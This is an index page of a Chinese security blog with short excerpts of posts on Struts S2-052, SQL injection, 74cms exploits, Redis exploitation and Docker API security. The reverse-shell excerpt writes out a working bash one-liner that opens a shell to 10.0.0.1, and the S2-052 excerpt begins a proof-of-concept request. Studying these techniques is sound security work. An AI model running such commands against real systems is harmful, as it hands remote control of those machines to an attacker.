分类 技术分享 下的文章:

Docker Remote API的安全配置
发表于: | 分类: 技术分享 | 评论:0 | 阅读: 2785
又是一年双十一,没有妹纸没有Money,还是写代码吧-.- 假期的时候写了个AWD的攻防平台,团队内部练习使用,部分靶机使用docker实现。前段时间进行了一次内部比赛测试,手工启动的docker,然后又往平台录入的docker信息,不够优雅(可以说相当麻烦)...

阅读全文>>

S2-052 POC
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1581
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1 Host: 192.168.2.108:8080 User-Agent: Mozil...

阅读全文>>

Python实现对比cms版本更新内容
发表于: | 分类: Python,代码审计 | 评论:2 | 阅读: 8380
对比两个cms版本代码差异,快速定位漏洞。使用方法python diff.py dir1 dir2 [1|0]是否显示更新内容 #!/usr/bin/env python #coding=utf-8 import sys import os import pwd...

阅读全文>>

利用order by 进行盲注
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 2542
0x01 利用场景登录代码:$username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql=&quo...

阅读全文>>

74cms人才系统注入+编写exp-2
发表于: | 分类: Python,代码审计 | 评论:0 | 阅读: 2096
0x00 前言这是第五届山东省信息安全技能大赛的一个靶机环境,比赛的环境估计给改代码了,降低了难度,自己当时用sqlmap直接跑出来了,但实际环境是跑不出来的,过滤了注释符和其他一些语句,需要结合cms进行构造。 参考漏洞:wooyun-2015-137002 ...

阅读全文>>

74cms人才系统注入+编写exp
发表于: | 分类: Python,代码审计 | 评论:0 | 阅读: 1756
0x00前言才开始学代码审计,找一些前人的漏洞分析下 参考文章:wooyun-2014-060905 原文只指出了出现漏洞的地方,没给出利用方法,拿来分析,并给出exp0x01代码分析根据原文给出的代吗,找到include/fun_personal.phpfu...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 4839
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1641
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...

阅读全文>>